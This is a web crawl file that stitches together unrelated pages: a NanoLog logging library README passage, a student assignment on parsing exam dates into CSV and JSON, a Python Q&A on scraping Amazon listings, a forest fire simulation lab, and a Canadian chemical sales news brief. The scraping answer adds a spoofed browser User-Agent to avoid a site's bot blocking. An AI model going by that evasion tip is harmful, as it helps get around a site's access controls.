the NanoLog library that is non-portable, even between compilations of the same application and each makeinvocation rebuilds this library. Additionally, the compilation should also generate a ./decompressorexecutable in the app directory and this can be used to reconstitute the full human-readable log file (instructions below). The sample applications are intended as a guide for how users are to interface with the NanoLog library. Users can modify these applications to test NanoLog's various API and functionality. The C++17 and Preprocessor versions of these applications reside in ./sample and ./sample_preprocessor respectively. One can modify main.ccin each directory, build/run the application, and execute the decompressor to examine the results. Below is an example for C++17 NanoLog's sample application. ```bash cd sample nano main.cc make clean-all make ./sampleApplication ./decompressor decompress /tmp/logFile Note: The sample application sets the log file to/tmp/logFile```. To use the NanoLog system in the code, one just has to include the NanoLog header (either NanoLogCpp17.h for C++17 NanoLog or NanoLog.h for Preprocessor NanoLog) and invoke the NANO_LOG()function in a similar fashion to printf, with the exception of a log level before it. Example below: #include "NanoLogCpp17.h" using namespace NanoLog::LogLevels; int main() { NANO_LOG(NOTICE, "Hello World! This is an integer %d and a double %lf\r\n", 1, 2.0); return 0; } Valid log levels are DEBUG, NOTICE, WARNING, and ERROR and the logging level can be set via NanoLog::setLogLevel(...) The rest of the NanoLog API is documented in the NanoLog.h header file. The execution of the user application should generate a compressed, binary log file (default locations: ./compressedLog or /tmp/logFile). To make the log file human-readable, simply invoke the decompressorapplication with the log file. ./decompressor decompress ./compressedLog After building the NanoLog library, the decompressor executable can be found in either the ./runtime directory (for C++17 NanoLog) or the user app directory (for Preprocessor NanoLog). The NanoLog project contains a plethora of tests to ensure correctness. Below is a description of each and how to access/build/execute them. The integration tests build and test the Nanolog system end-to-end. For both C++17 NanoLog and Preprocessor NanoLog, it compiles a client application with the NanoLog library, executes the application, and runs the resulting log file through the decompressor. It additionally compares the output of the decompressor to ensure that the log contents match the expected result. One can execute these tests with the following commands: bash cd integrationTest ./run.sh The NanoLog Library and Preprocessor engine also contain a suit of their own unit tests. These will test the inner-workings of each component by invoking individual functions and checking their returns match the expected results. To run the NanoLog preprocessor unit tests, execute the following commands: bash cd preprocessor python UnitTests.py To build and run the NanoLog library unit tests, execute the following commands: ```bash git submodule update --init cd runtime make clean make test ./test --gtest_filter=-assert ``` Note: The gtest filter is used to removed tests with assert death statements in them.
https://xscode.com/PlatformLab/NanoLog
CC-MAIN-2021-17
refinedweb
1,419
56.15
“A friend sent me a list of exams” The inputVous receive this string from a friend, it represents a list of all his/her examinations. You copy it and you store it in a .txt file. """ Samedi 23 : 14h - 18h : MES (Méthodologie Enquête Sondage) Mardi 26 : 16h30 - 18h30 : Finance Samedi 6 juin : 9-12 : stats 2ème 16 juin : : Oral Ndls """You can retrieve the information of "when you saved it to a txt file" using the "last-time modified date" of the file (or on windows, you can choose the "created date"). This information is easily available in python. You msut parse the string into the following format : {day_of_month}, {year}-{month}/{day}, {hour}:{minute} {end_hour}:{end_minute}, {name}The day of month must be in lowercase, a parameter can be added to your program to choose the language. The csv file and the ods fileThis file will be saved as a "csv" file. In our example, the .csv file would look like this (but of course this should work with other values) : samedi, 2020-05-23 mai, 14:00, 18:00, MES (Méthodologie Enquête Sondage) mardi, 2020-05-26, 16h30, 18h30, Finance samedi, 2020-06-06, 09:00, 12:00, stats 2ème mardi, 2020-06-16, unknown, unknown, Oral NdlsIn the beginning you don't have to write directly to a file, you can use The ods file and some graphs- Create a graph where X = date of the exam and Y = hour of the beginning of the exam. If the hour is unknown, remove the exam from the graph - Create a bar graph where each bar is labelled by the name of the exam and the value is the hour of beginning Note: If the hour is unknown, remove the exam from the graph Note: if you need, you can add another column being the "timestamp" of the date of the exam. A popular timestamp format is the "Unix timestamp". The matrix and the json fileAfter that, if you want, write a code that reads the csv file and convert into one of those python formats : Choice 1: A matrix where lines are like ["samedi", 2020, 5, 23, 14, 0, 18, 0, "MES (Méthodologie Enquête Sondage)"]Choice 2: A list of dictionnaries like { "day": "samedi", "date": "2020-05-23", "name": "MES (Méthodologie Enquête Sondage)", "beg_hour": 14, "beg_min": 0, "end_hour": 18, "end_min": 0 }The two formats can be saved as json file (using import jsonmodule). You can compute for example, the length of all of the exams. Specifications details1) If no month is provided, like when "mardi 26" is written. 1.1) (easy) you can consider it's current month (or date of the message) 1.2) (hard) it's must search the current year for the day at the given information, "mardi 23" will search for all Tuesday the 23rd, if two words exist, raise a ValueError (using code raise ValueError and a message saying "There exist two mardi 23 for year 2020"). 2) When you don't know what to choose, add a parameter to your program (using input or sys.argv or argparse). 3) The name of the file to translate can also be a parameter of the program. Some tips- Read "théorie 2", especially the part talking about "string" (theory 2). - To open a txt file read the theory about file. - Here is another theory file about matrices and dictionaries. - To manage datetime, use from datetime import datetime. For instance datetime(2020, 5, 20)can be used to create a datetime and datetime.now()will give the current time as a datetime. - To convert from and to json file, use import json. - To know more about modules (like random, datetime or json), read the module theory file. - Pro tip: regex ( import re) How to handle the assignment : - Using a git repository, just the url sent by mail - Or a zip file containing the files needed for the assignment (the txt file, your python file(s) needed (if more than one file, the main one should be called "main.py"), your .ods or .xlsx file containing the graphs). You must handle the assignement each Friday (if you have something of course), I will respond to the mail to give you tips until you finish the assignment (some people will need 1 week, others will need more). Cite your sources when you use information from the internet ! If you have any question, contact me on messenger or by mail using the school email adress, even if your question is "I did not understand this part of the assignment".
https://robertvandeneynde.be/parascolaire/exos-divers/parse-exams-csv-json-ods/index.html
CC-MAIN-2020-34
refinedweb
759
73.21
Answer:Answer: 1. Please check if the external IFCLK source is present before the firmware sets IFCONFIG.7 = 0. This is necessary in order to provide synchronization for the internal endpoint FIFO logic. IFCLK should be free running. 2. In your fw.c file, replace #define _IFREQ 48000 with #define _IFREQ “your IFCLK frequency in KHz units” For eg: # define _IFREQ 12000 //here the IFCLK frequency is 12MHz This macro has to be placed before you include #include "syncdly.h" This is because the SYNCDELAY calculations include the IFCLK value and an incorrect IFCLK value will give an incorrect synchronization delay. 3. Check if the slwr/slrd and data are meeting the setup and hold time requirements with respect to IFCLK
https://community.cypress.com/docs/DOC-12668
CC-MAIN-2020-40
refinedweb
121
63.09
/* Threads compatibility routines for libgcc2 and libobjc for LynxOS. */ /* Compile this one with gcc. */ /*_LYNX_H #define GCC_GTHR_LYNX_H #ifdef _MULTITHREADED /* Using the macro version of pthread_setspecific leads to a compilation error. Instead we have two choices either kill all macros in pthread.h with defining _POSIX_THREADS_CALLS or undefine individual macros where we should fall back on the function implementation. We choose the second approach. */ #include <pthread.h> #undef pthread_setspecific /* When using static libc on LynxOS, we cannot define pthread_create weak. If the multi-threaded application includes iostream.h, gthr-posix.h is included and pthread_create will be defined weak. If pthead_create is weak its defining module in libc is not necessarily included in the link and the symbol is resolved to zero. Therefore the first call to it will crash. Since -mthreads is a multilib switch on LynxOS we know that at this point we are compiling for multi-threaded. Omitting the weak definitions at this point should have no effect. */ #undef GTHREAD_USE_WEAK #define GTHREAD_USE_WEAK 0 #include "gthr-posix.h" #else #include "gthr-single.h" #endif #endif /* GCC_GTHR_LYNX_H */
http://opensource.apple.com//source/gcc_42/gcc_42-5531/gcc/gthr-lynx.h
CC-MAIN-2016-40
refinedweb
177
52.46
BizTalk Server SAN + File shares question - From: "BA" <biztalk.architect@xxxxxxxxx> - Date: Tue, 1 Apr 2008 08:47:38 -0400 Has anyone ever had problems with a farm of BizTalk servers picking up files from a SAN via a group of file shares? Apparently my client had this problem with BTS 2002 and I am wondering if anyone has heard of this issue existing on 2006. Has anyone ever experienced any problems using BizTalk with a SAN and 30+ file shares? Thanks, BA . - Prev by Date: RE: BizTalk Scheduled Task Adapter - Next by Date: Re: Best practice for deploying schemas to Biztalk applications - Previous by thread: Re: element in namespace has incomplete content - Next by thread: Re: Best practice for deploying schemas to Biztalk applications - Index(es):
http://www.tech-archive.net/Archive/BizTalk/microsoft.public.biztalk.general/2008-04/msg00009.html
crawl-002
refinedweb
127
63.63
Sorting is such a common task that C# includes an Array class with a flexible sort method for all your sorting needs. This class is located in the System namespace so make sure you add using System; to the top of your code file. Let us first look at a basic sort to see what the method looks likes: int[] v = {1, 3, 2, 4, 5}; Array.Sort(v); foreach (var i in v) { Console.WriteLine(i); } Console.Read(); If you run the code you will see the elements of v printed one per line in increasing order. The Sort method by default sorts items in increasing order. Change the code to this: double[] v = { 1.0, 3.1, 2.2, 4.3, 5.4 };Array.Sort(v); foreach (var i in v) { Console.WriteLine(i); } Console.Read(); When you run it, you will see that the items in v are still sorted in ascending order. This shows us that the Sort method is flexible enough to work with more than one data type. The question here is does it work with all types? The answer is simply no. This only works with objects that implement the IComparable interface. If we want to sort some collection that does not implement IComparable we must provide a class that implements IComparer to use for the comparison. Before we look at sorting using IComparable and IComparar let’s look at sorting ranges of arrays. For this, we will use the method: Array.Sort(Array array, int index, int length); This method requires you to provide the first index of the range and the length of the range you want to sort. Example: double[] v = { 3.0, 1.1, 2.2, 4.3, 5.4 }; Array.Sort(v, 0, 2);foreach (var i in v) { Console.WriteLine(i); } Console.Read(); In this example we are going to sort part of v from index 0 to index 1. Notice how we mentioned we are going to start at index 0 and sort the first 2 elements? Since arrays are 0 based we are only going to sort elements at position 0 to position 1. In general the range that is going to be sorted is [index, length-1]. When you run this code the output is the following: 1.3 3.0 2.2 4.3 5.4 Notice how the rest of the array after index 1 was not modified. If we wanted to start at index 2 and sort 4 elements we would write: Array.Sort(v, 2, 4); This code will throw an exception if there are not enough elements to fill the range properly. This means that there must be elements in positions 2, 3, 4, 5, 6 or this will crash. Using IComparable The use of IComparable allows us to sort arrays in complicated ways. Let us use an example of sorting in increasing order by age followed by descending lexicographical order by name. First, we need this class: class Person { public string Name { get; set; } public int Age { get; set; } }This class creates two fields and a setter and getter for the Name and Age field. This lets us change the age by doing p.Age = 10. Create this array: var people = new Person[4]; var p = new Person {Age = 10, Name = "chili5"}; people[0] = p; p = new Person {Age = 8, Name = "Zeus"}; people[1] = p; p = new Person {Age = 10, Name = "Fred"}; people[2] = p; p = new Person {Age = 11, Name = "Bob"}; people[3] = p; Next we have to implement the IComparable interface. Change the class declaration to this: class Person : IComparable The : is used to implement an interface. When we implement an interface this means that we must implement all methods defined in the interface. In this case this is the CompareTo(Object) function. Add this method below to the Person class: public int CompareTo(Object obj) { var p = (Person) obj; if (p.Age > Age) return -1; if (p.Age < Age) return 1; return p.Name.CompareTo(Name); } This method is used to compare two Person objects and returns positive if the object that we are comparing to another object comes first and returns negative if the object that we are using to compare to another instance comes second. If they are equal we return 0. Consider these two objects: var p = new Person {Age = 10, Name = "chili5"}; var p2 = new Person {Age = 8, Name = "Zeus"}; If we do p.CompareTo(p2) the result will be -1. Why? Well first we compare the ages of the two and p’s age is 10 which is bigger than p2’s age of 8. This means that in order of age p should come after p2. Hope this is helpful. Later we will look at LINQ and see how that implements complex sorting. Then you can make a judgement about which you prefer. In some cases it might be easier to use one over the other or in some cases such as databases it makes sense to use LINQ.
http://forum.codecall.net/topic/65333-c-flexible-sorting/
CC-MAIN-2018-39
refinedweb
840
72.16
Important: Please read the Qt Code of Conduct - How to use/include the QtNetwork Module Hello Everyone, i'm trying to develop a simple application in C++ that sends Files between two computers over LAN. After some research i found out that the QtNetwork Module is the way to go. I do include the QTcpServer and QTcpSocket in my solution. #include <QTcpServer> #include <QTcpSocket> I added the following path to the Additional Include Directories of my project. C:\Qt\5.14.2\msvc2017_64\include\QtNetwork I then tried a very simple Code. QTcpSocket* pTcpSocket = new QTcpSocket(); I get the "unresolved external symbol" Error which means that the functions are declared but are not defined. It seems to be a problem with the linking or building of the QtNetwork Module. On the Qt Website i found out that one should add the following line QT += network Since I have no experience with cmake or qmake i'm not sure where to add this line Can anyone please recommend a simple example or explain how to correctly use the Module? Thanks!! - jsulm Qt Champions 2019 last edited by @JohnSRV said in How to use/include the QtNetwork Module: i'm not sure where to add this line Open your pro file and add that line there other "QT += " lines are. if you are using a CMake project add find_package(Qt5 COMPONENTS Network REQUIRED)and then target_link_libraries(MyApp PUBLIC Qt5::Network)where MyAppis the name of your target Hey, thanks for the answers. I'm actually using a Visual Studio 2017 Project and that's why I'm confused. There's no pro File under the Path of my Project :/. Is it at all possible to use the Qt Network Module in a visual Studio 2017 Project ?? Thanks ! If you have the Qt Visual Studio Tools installed then right click on your project, go into the Qt Project property and in the modules tab put a tick next to Network no I don't have the Qt VS Tools installed. How can i install them? Thanks !! Update Now I installed the QT Vs Tools for VS 2017. Do I have to start new Project to add the Network Module or can i add it to my already exisiting VS Project? Last time I used the VS Tools (that was with VS 2013) it required to start a project from scratch, not sure if they introduced a "convert to qt project" feature since
https://forum.qt.io/topic/115740/how-to-use-include-the-qtnetwork-module/5
CC-MAIN-2020-45
refinedweb
409
66.57
In this tutorial, we will learn about the numpy.log() in Python. The Numpy module offers powerful data manipulation methods. It mostly deals with data stored in arrays. The Numpy.log() method lets you calculate the mathematical log of any number or array. Let’s learn how to use numpy.log() to calculate log in python. Table of Contents - 1 Using numpy.log() in Python - 2 Using numpy.log() on 0 - 3 Using Numpy.log() on Arrays - 4 Plotting numpy.log() function using Matplotlib - 5 Conclusion Using numpy.log() in Python To use numpy.log() we will first have to import the Numpy module. import numpy Now we can use numpy.log() to find out the log of different numbers. import numpy as np print(np.log(10)) Output: 2.302585092994046 Let’s try another example. import numpy as np print(np.log(np.e)) Output : 1.0 We get 1 as the output as numpy.log by default calculates the natural log. The natural log is calculated with a base of e. The value of e is : 2.718281828459 Let’s try calculating the log of 0. Using numpy.log() on 0 Let’s see what happens when we use the numpy.log function on 0. import numpy as np print(np.log(0)) Output: -inf /usr/local/lib/python3.6/dist-packages/ipykernel_launcher.py:1: RuntimeWarning: divide by zero encountered in log The logarithm of zero is not defined. It’s not a real number, because you can never get zero by raising anything to the power of anything else. There are some other logs that you can calculate using np.log. These are log2 and log10 which are logarithms with base 2 and 10 respectively. 1. Calculating log with base 2 To calculate logarithm with base 2, use log2 in place of log. import numpy as np print(np.log2(8)) Output: 3.0 Let’s try another example. import numpy as np print(np.log2(32)) Output: 5.0 2. Calculating log with base 10 To calculate logarithm with base 10, use log10 in place of log. import numpy as np print(np.log10(100)) Output : 2.0 Let’s try another example. import numpy as np print(np.log10(10000)) Output : 4.0 Using Numpy.log() on Arrays Let’s see how to use numpy.log on arrays. 1. Calculating Logarithm of a 1D array To calculate the logarithm of a 1D array use : import numpy as np arr = np.array([1,2,4,5,6,8]) print(np.log2(arr)) Output: [0. 1. 2. 2.32192809 2.5849625 3.] 2. Calculating Logarithm of a 2D array To calculate the logarithm of a 2D array use : import numpy as np arr_2d = np.arange(4,10).reshape((2,3)) print(arr_2d) print(np.log2(arr_2d)) Output : [[4 5 6] [7 8 9]] [[2. 2.32192809 2.5849625 ] [2.80735492 3. 3.169925 ]] Plotting numpy.log() function using Matplotlib Let’s try plotting a graph for the logarithmic function. To plot a graph we will need a lot of points in our array. Our approach is as follows : We will create a Numpy array of integers from 1 to 1000. Then we will store the log of this array. Finally, we will create a plot using the stored values. Let’s see the code for the same. import numpy as np import matplotlib.pyplot as plt arr = np.arange(start = 1, stop = 1000) log_val=np.log(arr) plt.plot(log_val,arr,color='purple') Output : Conclusion This tutorial was about the Numpy.log function in Python. We learn how to use numpy.log for calculating logs of integers and arrays. We also learned how to plot a graph using numpy.log and matplotlib.
https://www.journaldev.com/46723/numpy-log-in-python
CC-MAIN-2021-17
refinedweb
625
72.42
What are Access Modifiers? Have you ever wanted to define how people would access some of your properties? You would not want anyone using your underwear. However, your close friends and relatives can use your sweater and maybe your car. Similarly to how you set a level of access to your posessions,: . Let us use private in a coding example. If a bank wants to provide an interest rate of 10% on it’s loans, it would make sure that the interest rate variable(let us suppose int int_rate;) would stay private so as no other class would try to access it and change it. For example; private String name; The above example creates a variable called name and ensures that it is only accessible within the class from which it was created. Another example for a and it means that it is accessible from any class. Public access modifier can be likened to a public school where anyone can seek admission and be admitted. A public class, method, or variable can be accessed from any other class at any time. For example, to declare a class as public, all you need is: public class Animal{ } As such, the Animal class can be accessed by any other class. public int age; public int getAge(){ } Above are ways of specifying a variable and a method as public. The Default Access Modifier The default access modifier is different from all the other access modifiers in that it has no keyword. To use the default access modifier, you simply use none of the other access modifiers and that simply means you are using a default access modifier. For example, to use the default access modifier for a class, you use class Bird{ } This basically means you are using the default access modifier. The default access modifier allows a variable, method, or class to be accessible by other classes within the same package. A package is a collection of related classes in a file directory. For more information about packages, check out the section on packages. Any variable, method, or class declared to use the default access modifier cannot be accessed by any other class outside of the package from which it was declared. int age; void setNewAge(){ } Above are some ways of using the default access modifier for a variable or method. Don’t forget, the default access modifier does not have a key word. The absence of the 3 other access modifiers means you are using the default access modifier. Protected Access Modifier The protected access modifier is closely related to the default access modifier. The protected access modifier has the properties of the default access modifier but with a little improvement. A variable and method are the only ones to use the protected access modifier. The little improvement is that a class outside the class package from which the variable or method was declared can access the said variable or method. This is possible ONLY if it inherits from the Class, however. The class from another package which can see protected variables or methods must have extended the Class that created the variables or methods. Note without the advantage of Inheritance, a default access modifier has exactly the same access as a protected access modifier. Examples of using the protected access modifier is shown below: protected int age; protected String getName(){ return "My Name is You"; } Access Modifiers on Classes By default, classes can only have 2 modifiers: - public - no modifier (default modifier) So this means classes can never be set to private or protected? This is logical, why would you want to make a private class? No other class would be able to use it. But sometimes, you can embed a class into another class. These special classes, inner classes, can be set to private or protected so that only its surrounding class can access it: public class Car { private String brand; private Engine engine; // ... private class Engine { // ... } } In the above example, only the Car class can use the Engineclass. This can be useful in some cases. Other classes can never be set to protected or private, because it makes no sense. The protectedaccess modifier is used to make things package-private but with the option to be accessible to subclasses. There is no concept such as ‘subpackages’ or ‘package-inheritance’ in java.
https://www.freecodecamp.org/news/java-access-modifiers-explained/
CC-MAIN-2022-05
refinedweb
723
53.71
right now my program asks for 5 candidates but i want to make the user input as many candidates as they want to. how would i go about doing that?? #include <iomanip> #include <string> using namespace std; int sumVotes(int list[], int size); int winnerIndex(int list[], int size); int main() { string candidates[5]; int votes[5] = {0}; int totalVotes; int i; cout << fixed << showpoint; cout << setprecision(2); cout << "Enter candidate's name and the votes received by " <<"the candidate." << endl; for (i = 0; i < 5; i++) cin >> candidates[i] >> votes[i]; totalVotes = sumVotes(votes, 5); cout << "Candidate Votes Received % of Total Votes" << endl; for (i = 0; i < 5; i++) cout << left << setw(10) << candidates[i] << right << " " << setw(10) << votes[i] << " " << setw(15) << (static_cast<double>(votes[i]) / static_cast<double>(totalVotes)) * 100 << endl; cout << "Total " << totalVotes << endl; cout << "The Winner of the Election is " << candidates[winnerIndex(votes, 5)] << "." << endl; return 0; } int sumVotes(int list[], int size) { int sum = 0; for (int i = 0; i < size; i++) sum = sum + list[i];return sum; } int winnerIndex(int list[], int size) { int winInd = 0; for (int i = 0; i < size; i++) if (list[i] > list[winInd]) winInd = i; return winInd; }
https://www.daniweb.com/programming/software-development/threads/358095/am-trying-to-figure-how-to-make-my-program-truly-dynamic
CC-MAIN-2021-43
refinedweb
197
53.89
I m new to python and using Python 3.6.2 and I m trying to scrape data from first 2 page using a specific keyword. So far I m able to get the data into Python IDLE window, but I m facing difficulty in exporting data to CSV.I have tried using BeautifulSoup 4 and pandas but not able to export. Here is the so far what I have done. Any help would be much appreciated. import csv import requests from bs4 import BeautifulSoup import pandas as pd url = "- alias%3Dautomotive&field- keywords=helmets+for+men&rh=n%3A4772060031%2Ck%3Ahelmets+for+men&ajr=0" request = requests.get(url) soup = BeautifulSoup(request.content, "lxml") #filename = auto.csv #with open(str(auto.csv,"r+","\n")) as csvfile: #headers = "Count , Asin \n" #fo.writer(headers) for url in soup.find_all('li'): Nand = url.get('data-asin') #print(Nand) Result = url.get('id') #print(Result) #d=(str(Nand), str(Result)) df=pd.Index(url.get_attribute('url')) #with open("auto.txt", "w",newline='') as dumpfile: #dumpfilewriter = csv.writer(dumpfile) #for Nand in soup: #value = Nand.__gt__ #if value: #dumpfilewriter.writerows([value]) df.to_csv(dumpfile) dumpfile.close() csvfile.csv.writer("auto.csv," , ',' ,'|' , "\n") I added user-agent in request to site to escape auto blocking bots. You got a lot of None because you didn't specify which precisely <li> tags do you want. I added it to code as well. import requests from bs4 import BeautifulSoup import pandas as pd url = "" request = requests.get(url, headers={'User-Agent':'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'}) soup = BeautifulSoup(request.content, "lxml") res = [] for url in soup.find_all('li', class_ = 's-result-item'): res.append([url.get('data-asin'), url.get('id')]) df = pd.DataFrame(data=res, columns=['Nand', 'Result']) df.to_csv('path/where/you/want/to/store/file.csv') EDIT: for processing all pages you need to build a loop that generates urls which you will then pass to main processing block (which you already have). Check out this page:. Interesting here is ref parameter - ref=sr_pg_2. Its value is for page 2. I think you know, what to do next=)
https://codedump.io/share/eepQfw08L835/1/scraping-web-contents-from-first-two-page-and-export-scraped-data-to-csv-using-python-and-bs4
CC-MAIN-2019-26
refinedweb
372
55.5
Process Overview for Creating and Implementing RTF Sub Templates You must follow this process to work with RTF sub templates. Using a sub template consists of the following steps (described in the following sections): - Create the RTF file that contains the common components or processing instructions that you want to include in other templates. - Create the calling or "main" layout and include the following two commands: import - to import the sub template file to the main layout template. call-template - to execute or render the sub template contents in the main layout. - Test the template and sub template. Tip:You can use the Publisher Desktop Template Viewer to test the main layout plus sub template before loading them to the catalog. To do so, you must alter the import template syntax to point to the location of the sub template in the local environment. See Test Subtemplates from the Desktop. - Upload the main template to the report definition and create the Sub Template object in the catalog. See Upload a Subtemplate.
https://docs.oracle.com/en/cloud/paas/analytics-cloud/acpmr/process-overview-creating-and-implementing-rtf-subtemplates.html
CC-MAIN-2020-50
refinedweb
171
62.78
Odoo Help Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps: CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc. Name Error : Name 'time' is not defined Hello all, I am getting an error while refreshing the page in V7 server/openerp/addons/base/ir/ir_ui_menu.py", line 336, in get_needaction_data dom = menu.action.domain and eval(menu.action.domain, {'uid': uid}) or [] erver/openerp/tools/safe_eval.py", line 241, in safe_eval return eval(test_expr(expr, _SAFE_OPCODES, mode=mode), globals_dict, locals_dict) File "", line 1, in <module> NameError: name 'time' is not defined What may be the issue? Please help.. Hi, It seems that's a known bug: I went through the the fix proposed and tested it and, at a first glance, it works! Hope this helps! <record id="action_view_task" model="ir.actions.act_window"> <field name="name">Tasks</field> <field name="res_model">project.task</field> <field name="view_mode">kanban,tree,form,calendar,gantt,graph</field> <field name="domain">[('date','=',time.strftime('%Y-%m-%d')),('user_id','=',uid)]</field> <field name="filter" eval="True"/> <field name="search_view_id" ref="view_task_search_form"/> <field name="help" type="html"> <p class="oe_view_nocontent_create"> Click to create a new task. </p><p> OpenERP's project management allows you to manage the pipeline of tasks in order to get things done efficiently. You can track progress, discuss on tasks, attach documents, etc. </p> </field> </record> This is my action code. Add this line at top of your code, with the other import lines: import time Hi GuruDev, Maybe you have not imported time library in your py file. That's why it is giving error of time. Hope it will work after importing time in py file. Thanks for the reply, Keyur.. I should import it in the ir_ui_menu.py file? How to import? in the .py file.. import time is it ok? Have you created your custom module? Have you created any menu or apply domain on any action? I think the error comes because of the domain in action. I didint create any module. But I duplicated some groups and made some modification in acces. And also, I didnt add any domain. Basic addons are not error prone. Maybe there can be other reason. You should try different database maybe then it will work properly. Dear Keyur, I was creating a new user group for Approvals. I've added a new Menu item into the Existing Accounting-Menu and gave acces rights for this newly created user group. That menu item contains...an action---Purchase Orders Waiting for Approval. This was the only change that I made. Can you please paste your action code here? I will try it in my custom module. Then I can figure out what exactly the problem is. hello Keyur...I need your help..i am adding domain in action the its giving error of time is not defined..I have defined import time in .py file..but of no use..Please help About This Community Odoo Training Center Access to our E-learning platform and experience all Odoo Apps through learning videos, exercises and Quizz.Test it now
https://www.odoo.com/forum/help-1/question/name-error-name-time-is-not-defined-22212
CC-MAIN-2017-39
refinedweb
525
69.99
I'd like to parameterize a class with the type of an object to make my code more generic. By doing this, I don't need an implementation for all objects that extend a certain trait. I have the following code that demonstrates my goal: abstract trait Foo { def greet } object Coo extends Foo { def greet = println("Coo!") } object Boo extends Foo { def greet = println("Boo!") } class A[Fooer <: Foo] { def moo = asInstanceOf[Fooer].greet() } object Main extends App { new A[Coo.type].moo() // hopefully prints "Coo!" } java.lang.ClassCastException: A cannot be cast to Foo asInstanceOf this And I believe it's because of the asInstanceOfcall which is seemingly using thisimplicitly. Every class in Scala extends Any, which inherits the special method asInstanceOf, among other things. I wouldn't say it's happening implicitly--it's just that you're calling a member method of that class, which is calling it on itself. Same as if you wrote def moo = greet. Furthermore, any time you use asInstanceOf, you're asking the compiler to lie to itself and keep going. This will more often than not result in a ClassCastException. In this case, it's because you're attempting to cast an instance A into some unknown sub-type of Foo. This will never work. In the very specific case, you're attempting to pass the singleton type Coo.type to an instance of A and then create a new instance of Coo.type. While there are many other reasons why this won't work, one of them is that you can't create a second instance of a singleton type--it's called that for a reason. More generally, you don't know that you can simply construct an object given a type. A type doesn't have a constructor, a class does. This might be a side-effect of being a simplified example, but you're concerned with creating an instance of A with some type parameter without needing to pass it an actual object, but the objects you're concerned with already exist. So why not pass them? class A[Fooer <: Foo](f: Fooer) { def moo = f.greet } The only other way to do this is to provide evidence that Fooer can be constructed. There are no type constraints for proving something is a constructable class, though. What you can do is require a Class meta object instead: class A[Fooer <: Foo](clazz: Class[Fooer]) { def moo = clazz.newInstance.greet } This is crude, however. First, it doesn't work with your singleton types above (because they can't be constructed again). And second, we can only call newInstance when there are no constructor parameters to provide, and there's no way to enforce that. So while this will work: scala> class Bar extends Foo { def greet = print("Bar") } scala> new A(classOf[Bar]).moo Bar The following will not: scala> class Baz(i: Int) extends Foo { def greet = println("Baz") } defined class Baz scala> new A(classOf[Baz]).moo java.lang.InstantiationException: Baz scala> new A(classOf[Coo.type]).moo <console>:14: error: class type required but Coo.type found new A(classOf[Coo.type]).moo ^ Alternatively, you might use a type class that allows you to consistently build instances of Foo, but that would require creating one for each sub-class. e.g.: trait FooBuilder[A] { def build(): A } implicit object BarBuilder extends FooBuilder[Bar] { def build() = new Bar } class A[Fooer <: Foo](implicit fb: FooBuilder[Fooer]) { def moo = fb.build().greet }
https://codedump.io/share/pZu02khliK3O/1/how-can-i-parameterize-a-class-with-an-object39s-type-to-get-an-instance-of-it-in-scala
CC-MAIN-2017-09
refinedweb
586
65.52
Run update21 in a terminal window to create cs21/labs/11 directory. Then cd into your cs21/labs/11 directory and create the python program for lab 11 in this directory. The program handin21 will only submit files in this directory. There are some optional components that allow you to further practice your skills in Python. These optional components will not be graded, but may be interesting for those wanting some extra challenges. Fighting fires is a very risky job, and proper training is essential. In the United States, the National Fire Academy offers classes that are intended to enhance the ability of fire fighters to deal more effectively with forest fires. The Academy has worked with the U.S. Forest Service to develop a three-dimensional fire fighting training simulator. This simulator allows fire fighters to test out strategies under a variety of topographic settings and weather conditions, and to learn which approaches tend to be more successful. Using simulations to model real-world problems where it may be too difficult, time-consuming, costly or dangerous to perform experiments is a growing application of computer science. For this lab you will create your own two-dimensional fire simulator. The idea for this lab came from a 2007 SIGCSE Nifty Assignment suggested by Angela B. Shiflet of Wofford College. We are providing you with a basic Terrain class. You will be using an instance of this class inside the fire simulation class that you will be writing. You do not need to modify the Terrain class, but you do need to know how to use it. The Terrain class models a forest as a rectangular grid of rows and columns. Each cell in the grid is in one of three possible states: Examine the methods in the Terrain class by opening a Python shell, importing the Terrain module using from terrain import * and running help(Terrain). The sample code below shows how the methods might be used. from terrain import * t = Terrain(10, 12) t.setEmpty(3,3) t.setBurning(1,2) t.update() t.close()The resulting Terrain is shown below. Note that cell in location (0,0) is in the lower left corner. Be sure you understand how to use the Terrain class before going on. In particular, note that the terrain does not immediately update after a call to setEmpty or setBurning. Instead, you must call update which will update all cells with their new status. The basic rules for updating the status each cell is as follows: The image below shows the status of a fire after 10 steps: def main(): f = FireSim(10, 12, .55) f.startFire() f.spread() print "This fire burned %0.2f%% of the Terrain in %d steps" \ % (f.percentBurned(), f.numSteps()) f.close() A sample run of this function might print: This fire burned 69.17% of the Terrain in 18 steps. You may have different method names with different parameters. Remember, the design is up to you as long as you implement all the requirements. Be sure to test your class by creating some terrains with different sizes, changing the probability of burning, or starting fires in different locations. if random() < prob: print "yes" There are many extensions you could add to this program. You could modify how the fire spreads by adding additional rules or parameters. For example, perhaps the probability of catching on fire depends on the number of neighboring trees that are on fire. Perhaps you can add a wind direction and modify the probabilities such that trees down-wind of an active fire are more likely to burn. Perhaps you can create an initial grid with a few "fire lines" of empty cells to prevent fires from spreading. Add a feature where cells could randomly start burning even if no neighbors are burning (as happens with lightning). Allow fire to spread to cells that are more than one cell away. If you allow this feature, can you get a fire to jump a fire line? More complex models could factor in topography, soil moisture, smoldering fires, etc., and are actually used in some geographical information system (GIS) applications for predicting and modeling forest fire risk. Once you are satisfied with your program, hand it in by typing handin21 in a terminal window.
https://web.cs.swarthmore.edu/~adanner/cs21/s15/Labs/lab11.php
CC-MAIN-2020-29
refinedweb
716
64.51
16 August 2011 15:20 [Source: ICIS news] TORONTO (ICIS)--?xml:namespace> Compared with June 2010, chemical industry sales were up 9.2%, Statistics Canada said. Sales of petroleum and coal products fell 6.6% in June from May, to C$5.84bn, but were up 9.5% year on year. Overall Canadian manufacturing sales fell by 1.5% in June from May, to C$45.31bn – marking their third decline in a row after growing steadily since May 2009. Statistics Compared with June 2010, Canada's overall manufacturing sales were up 2.3%. June’s inventories were flat at C$63.16bn compared with May, but up 8.9% from June 2010. June’s new orders were worth C$47.25bn, up 1.6% from May and up 5.2% year on year from June 2010. The inventory-to-sales ratio was 1.39 in June, compared with 1.37 in May and 1.31 in June 2010. The ratio measures how many months it would take to deplete stocks at the current rate of sales. (
http://www.icis.com/Articles/2011/08/16/9485648/canada-june-chemical-sales-rise-5.8-from-may.html
CC-MAIN-2014-52
refinedweb
177
